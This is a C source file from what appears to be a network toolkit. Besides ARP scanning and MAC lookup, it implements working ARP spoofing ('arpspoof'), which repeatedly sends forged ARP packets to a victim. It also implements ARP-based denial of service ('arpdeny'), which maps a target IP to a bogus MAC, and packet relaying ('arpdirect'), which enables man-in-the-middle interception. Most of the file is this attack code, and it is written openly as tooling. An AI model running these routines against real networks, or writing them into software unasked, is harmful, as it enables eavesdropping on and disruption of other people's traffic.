/* -*- Mode:C; c-file-style:"gnu"; indent-tabs-mode:nil; -*- */
/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation;
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 * Author: Marco Guastella <vasta@ragnu.it>
 */
 
 #include "../core.h"
 
l_str l_arprequest(const l_str dev,const l_str maclocal,struct addrinfo *ipsrc,struct addrinfo *ipdst,l_out out)
{
	l_str filter=l_newstr();
	l_str host=l_newstr();
	l_str port =l_newstr();
	l_str ret=l_newstr();
	l_sraw sraw=0;
	l_time time;
	l_bool found=FALSE;
	l_arpv4 av4=0;
	if(maclocal == 0 || !l_isstrmac(maclocal))
		l_err(out,"l_arprequest:maclocal not bad format");
	else
	{
		av4=l_newarpv4();
		l_getaddrinfo(ipdst,&host,&port,out);
		if(! l_isouterr(out))
		{	
			l_writestr(&filter,"arp and src host %s",host);
			if((sraw=l_opensraw(dev,filter,out)) != 0)
			{
				l_resetbuf(sraw->bsend);
				switch(l_getdevtype(dev,out))
				{
					case LETH:  	l_addethheader("FF:FF:FF:FF:FF:FF",maclocal,0x0806,sraw->bsend,0);
								if(ipsrc->ai_family == AF_INET && ipdst->ai_family == AF_INET)
								{
									l_addarpv4header(0x0001,0x0800,0x0001,maclocal,ipsrc,"00:00:00:00:00:00",ipdst,sraw->bsend,l_sizebuf(sraw->bsend));
									l_srawsend(sraw,out);	
									time=l_newtime();
									while(!found && l_gettime(time) <= 0.5)
									{
										if(srawrecv(sraw,out) != 0)
										{	
											l_readarpv4(sraw->brecv,14,av4);
											found=TRUE;
											l_strcpy(&ret,av4->smac);
										}	
									}		
								}
								else if(ipsrc->ai_family == AF_INET6 && ipsrc->ai_family == AF_INET6)
								{
									l_err(out,"l_arprequest:ipv6 not implemented");
								}
								else
									l_err(out,"l_arprequest:ip address incompatible type");	
						   
								break;
					case NOTYPE:  l_err(out,"l_arprequest:no device type valid");
								break;			
					default:		l_err(out,"l_arprequest:no device type implemented");
								break;			
				}
			}		
		}
	}		
	l_closesraw(&sraw);
	l_freearpv4(&av4);
	l_freestr(&host);
	l_freestr(&port);	
	l_freestr(&filter);
	return ret;
}

/*external*/

void l_scanlan(const l_str dev,const l_str ipsrc,const l_str netmask,const l_str maclocal,l_bool pvideo,l_out out)
{
	l_num nhost;
	struct addrinfo *subnet=0,*sip=0;
	l_out out2=l_newout();
	l_str host=l_newstr();
	l_str port=l_newstr();
	l_str ipsrc2=l_newstr();
	l_str netmask2=l_newstr();
	l_str maclocal2=l_newstr();
	l_str arp;
	if(ipsrc==0)
		ipsrc2=l_getstrdevip(dev,out);
	else
		l_strcpy(&ipsrc2,ipsrc);
	if(netmask==0) 
		netmask2= l_getstrdevmask(dev,out);
	else
		l_strcpy(&netmask2,netmask);
	if(maclocal == 0)
		maclocal2= l_getstrdevhw(dev,out);
	else
		l_strcpy(&maclocal2,maclocal);
	if(ipsrc2 == 0 || netmask2 == 0 || maclocal2==0);
	else if((sip=l_newaddrinfo(ipsrc2,"0",0,0,out)) != 0 && (subnet=l_getsubnetaddrinfo(ipsrc2,netmask2,&nhost,out)) != 0)
	{
		while(nhost > 0)
		{
			l_incraddrinfo(subnet);
			nhost--;
			arp=l_arprequest(dev,maclocal2,sip,subnet,out);
			if(l_isouterr(out))
				break;
			l_getaddrinfo(subnet,&host,&port,out2);
			if(arp==0)
			{	
				l_cok(out,"%s => not found",host);
				if(pvideo)
					l_stdout("%s => not found\n",host);
			
			}
			else
			{	
				l_cok(out,"%s => %s",host,arp);
				if(pvideo)
					l_stdout("%s => %s\n",host,arp);
				l_freestr(&arp);
			}
		}			
	}
	l_freeaddrinfo(&subnet);
	l_freeaddrinfo(&sip);
	l_freestr(&host);
	l_freestr(&port);
	l_freestr(&ipsrc2);
	l_freestr(&netmask2);
	l_freestr(&maclocal2);
	l_freeout(&out2);
}

l_str l_getremotemac(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,l_out out)
{
	struct addrinfo *sip=0,*dip=0;
	l_str ipsrc2=l_newstr();
	l_str maclocal2 = l_newstr();
	l_str arp=l_newstr();
	if(ipsrc==0)
		ipsrc2=l_getstrdevip(dev,out);
	else
		l_strcpy(&ipsrc2,ipsrc);
	if(maclocal == 0)
		maclocal2= l_getstrdevhw(dev,out);
	else
		l_strcpy(&maclocal2,maclocal);
	if(ipsrc2 == 0 || maclocal2==0);
	else if((sip=l_newaddrinfo(ipsrc2,"0",0,0,out)) != 0 && (dip=l_newaddrinfo(ipdst,"0",0,0,out)) != 0)
		arp=l_arprequest(dev,maclocal2,sip,dip,out);
	l_freeaddrinfo(&sip);
	l_freeaddrinfo(&dip);
	l_freestr(&ipsrc2);
	l_freestr(&maclocal2);
	return arp;
}

void l_getremotemac2(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,l_out out)
{
	l_str arp;
	arp=l_getremotemac(dev,ipsrc,ipdst,maclocal,out);
	if(arp != 0)
	{
		l_cok(out,"%s => %s",ipdst,arp);
		l_freestr(&arp);
	}
	else if(arp==0 && ! l_isouterr(out))
		l_cok(out,"%s => not found",ipdst);
}

l_bool l_macdouble(const l_str dev,const l_str ip1,const l_str ip2,l_str *mac1,l_str *mac2,l_out out)
{
	l_str msp;
	l_freestr(mac1);
	l_freestr(mac2);
	if(l_isstripv4(ip1) && l_isstripv4(ip2))
	{
		(*mac1)=l_getremotemac(dev,"1.1.1.1",ip1,"00:00:00:00:00:00",out);
		(*mac2)=l_getremotemac(dev,"1.1.1.1",ip2,"00:00:00:00:00:00",out);
		if((*mac1) == 0 || (*mac2) == 0)
		{	
			msp=l_getstrdevhw(dev,out);
			if(!l_isouterr(out))
			{	
				if((*mac1)==0)
					(*mac1)=l_getremotemac(dev,"1.1.1.1",ip1,msp,out);
				if((*mac2)==0)
					(*mac2)=l_getremotemac(dev,"1.1.1.1",ip2,msp,out);
				l_freestr(&msp);
			}
		}	
	}
	else if(l_isstripv6(ip1) && l_isstripv6(ip2))
	{
		(*mac1)=l_getremotemac(dev,"::11:11",ip1,"00:00:00:00:00:00",out);
		(*mac2)=l_getremotemac(dev,"::11:11",ip2,"00:00:00:00:00:00",out);
		if((*mac1) == 0 || (*mac2) == 0)
		{	
			msp=l_getstrdevhw(dev,out);
			if(!l_isouterr(out))
			{
				if((*mac1)==0)
					(*mac1)=l_getremotemac(dev,"::11:11",ip1,msp,out);
				if((*mac2)==0)
					(*mac2)=l_getremotemac(dev,"::11:11",ip2,msp,out);
				l_freestr(&msp);
			}
		}
	}
	else if((l_isstripv4(ip1) && l_isstripv6(ip2)) || (l_isstripv6(ip1) && l_isstripv4(ip2))) 
		l_err(out,"l_macdouble:ip address %s - %s incompatible type",ip1,ip2);
	else
		l_err(out,"l_macdouble:ip address not valid(%s - %s)", ip1,ip2);	
	if((*mac1) != 0 && (*mac2)!=0)
		return TRUE;
	l_freestr(mac1);
	l_freestr(mac2);
	return FALSE;
}

/*arpspoof group*/

void *l_arpspoof_init(const l_str dev,const l_str ipvict,const l_str ipspoof,const l_str macspoof)
{
	l_arpspoof aspoof=(l_arpspoof)l_malloc0(sizeof(struct arpspoof));
	aspoof->out=l_newout();
	aspoof->sraw=0;
	l_str msp=l_newstr();
	struct addrinfo *ipsrc=0,*ipdst=0;
	if(macspoof == 0)
		msp=l_getstrdevhw(dev,aspoof->out);
	else
		l_strcpy(&msp,macspoof);
	if(msp == 0 || !l_isstrmac(msp))
		l_err(aspoof->out,"l_arpspoof:maclocal not bad format");
	else if((ipsrc=l_newaddrinfo(ipspoof,"0",0,0,aspoof->out)) == 0 || (ipdst=l_newaddrinfo(ipvict,"0",0,0,aspoof->out)) == 0);
	else if((aspoof->sraw=l_opensraw(dev,0,aspoof->out)) != 0)
	{
		l_resetbuf(aspoof->sraw->bsend);
		switch(l_getdevtype(dev,aspoof->out))
		{
			case LETH: 	l_addethheader("FF:FF:FF:FF:FF:FF",msp,0x0806,aspoof->sraw->bsend,0);
						if(ipsrc->ai_family == AF_INET && ipdst->ai_family == AF_INET)
							l_addarpv4header(0x0001,0x0800,0x0001,msp,ipsrc,"00:00:00:00:00:00",ipdst,aspoof->sraw->bsend,l_sizebuf(aspoof->sraw->bsend));
						else if(ipsrc->ai_family == AF_INET6 && ipsrc->ai_family == AF_INET6)
							l_err(aspoof->out,"l_arprequest:ipv6 not implemented");
						else
							l_err(aspoof->out,"l_arprequest:ip address incompatible type");	
						break;   
			case NOTYPE:  l_err(aspoof->out,"l_arpspoof:no device type valid");
						break;			
			default:		l_err(aspoof->out,"l_arpspoof:no device type implemented");
						break;
		}
	}
	l_freestr(&msp);
	l_freeaddrinfo(&ipsrc);
	l_freeaddrinfo(&ipdst);
	return (void *) aspoof;
}

l_bool l_arpspoof_err(void *data)
{
	l_arpspoof aspoof = (l_arpspoof) data;
	if(l_isouterr(aspoof->out))
		return TRUE;
	return FALSE;
}

void *l_arpspoof_exec(void *data)
{
	l_arpspoof aspoof = (l_arpspoof) data;
	if(l_isouterr(aspoof->out))
		return 0;
	l_srawsend(aspoof->sraw,aspoof->out);
	if(l_isouterr(aspoof->out))
		return 0;
	while(1)
	{
		l_sleep(5);
		l_srawsend(aspoof->sraw,aspoof->out);
	}		
}

l_out l_arpspoof_close(void **pdata)
{
	l_out ret;
	l_arpspoof aspoof = (l_arpspoof) (*pdata);
	l_closesraw(&(aspoof->sraw));
	ret=aspoof->out;
	l_free(pdata);
	return ret;
}

/*end arpspoof group*/

/*arpdeny section*/

void *l_arpdeny_init(const l_str dev,const l_str ipvict,const l_str ipdeny,l_str macspoof)
{
	l_str arp=l_newstr();
	l_str arp2=l_newstr();
	l_arpdeny adeny=(l_arpdeny)l_malloc0(sizeof(struct arpdeny));
	adeny->out=l_newout();
	adeny->spoof=0;
	l_str carp=l_newstr();
	l_macdouble(dev,ipvict,ipdeny,&arp,&arp2,adeny->out);
	if(!l_isouterr(adeny->out))
	{
		if(arp != 0)
		{
			if(arp2 != 0)
			{
				if(macspoof==0)
					carp=l_incrdigitmac(arp2,8);
				else
					l_writestr(&carp,"%s",macspoof);
				adeny->spoof=l_arpspoof_init(dev,ipvict,ipdeny,carp);
				
			}
			else
				l_err(adeny->out,"l_arpdeny:not found host with address %s",ipvict);
		}	
		else
			l_err(adeny->out,"l_arpdeny:not found host with address %s",ipdeny);	
	}
	l_freestr(&arp);	
	l_freestr(&arp2);
	l_freestr(&carp);
	return (void *) adeny;
}

l_bool l_arpdeny_err(void *data)
{
	l_arpdeny adeny=(l_arpdeny) data;
	if(l_isouterr(adeny->out) || l_arpspoof_err(adeny->spoof))
		return TRUE;
	return FALSE;	
}

void *l_arpdeny_exec(void *data)
{
	l_arpdeny adeny=(l_arpdeny) data;
	if(l_isouterr(adeny->out))
		return 0;
	l_arpspoof_exec((void *) adeny->spoof);
	return 0;
}

l_out l_arpdeny_close(void **pdata)
{
	l_out ret;
	l_arpdeny adeny=(l_arpdeny)(*pdata);
	if(adeny->spoof == 0)
		ret=adeny->out;
	else	
	{	
		l_freeout(&(adeny->out));
		ret=l_arpspoof_close((void **) &(adeny->spoof));
	}
	l_free(pdata);
	return ret;
}

/*end arpdeny section*/

/*arpdirect section*/

void *l_arpdirect_init(const l_str dev,const l_str ipsrc,const l_str ipdst,const l_str maclocal,const l_str filter)
{
	l_str lmac=l_newstr();
	l_str smac=l_newstr();
	l_str dmac=l_newstr();
	l_str f=l_newstr();
	l_arpdirect darp=(l_arpdirect)l_malloc0(sizeof(struct arpdirect));
	darp->out=l_newout();
	darp->sraw=0;
	if(maclocal == 0)
		lmac=l_getstrdevhw(dev,darp->out);
	else
		l_strcpy(&lmac,maclocal);
	if(lmac == 0 || !l_isstrmac(lmac))
		l_err(darp->out,"l_arpspoof:maclocal not bad format");
	else if(l_macdouble(dev,ipsrc,ipdst,&smac,&dmac,darp->out))
	{
		if(filter == 0)
			l_writestr(&f,"not arp and ether src %s and ether dst %s",smac,lmac); 
		else
			l_writestr(&f,"not arp and ether src %s and ether dst %s and (%s)",smac,lmac,filter);
		if((darp->sraw=l_opensraw(dev,f,darp->out)) != 0)
		{
			l_resetbuf(darp->sraw->bsend);
			switch(l_getdevtype(dev,darp->out))
			{
				case LETH: 	l_strmactobuf(dmac,darp->sraw->bsend,0);
							l_strmactobuf(lmac,darp->sraw->bsend,MACADDRLEN);
							darp->point1=0;
							darp->point2=MACADDRLEN*2;
							break;
				case NOTYPE:  l_err(darp->out,"l_arpdirect:no device type valid");
							break;			
				default:		l_err(darp->out,"l_arpdirect:no device type implemented");
							break;
			}
		}
	}
	l_freestr(&lmac);
	l_freestr(&smac);
	l_freestr(&dmac);
	return (void *) darp;	
}

l_bool l_arpdirect_err(void *data)
{
	l_arpdirect darp = (l_arpdirect) (data);
	if(l_isouterr(darp->out))
		return TRUE;
	return FALSE;
}

void droutine(l_uchar *args, const struct pcap_pkthdr *header,const l_uchar *packet)
{
	l_arpdirect darp = (l_arpdirect)args;
	l_newsizebuf(darp->sraw->bsend,header->len);
	l_writebuf(darp->sraw->bsend,0,(void *)packet,(darp->point1));
	l_writebuf(darp->sraw->bsend,(darp->point2),(void *)(packet+darp->point2),(header->len)-(darp->point2));
	l_srawsend(darp->sraw,darp->out);
}

void *l_arpdirect_exec(void *data)
{
	l_arpdirect darp = (l_arpdirect) (data);
	if(l_isouterr(darp->out))
		return 0;
	l_srawroutine(darp->sraw,droutine,(l_uchar *)data,darp->out);
	return 0;	
}

l_out l_arpdirect_close(void **pdata)
{
	l_arpdirect darp = (l_arpdirect) (*pdata);
	l_out ret;
	l_closesrawroutine(&(darp->sraw));
	ret=darp->out;
	l_free(pdata);
	return ret;
}

/*end arpdirect section*/

/*end external*/
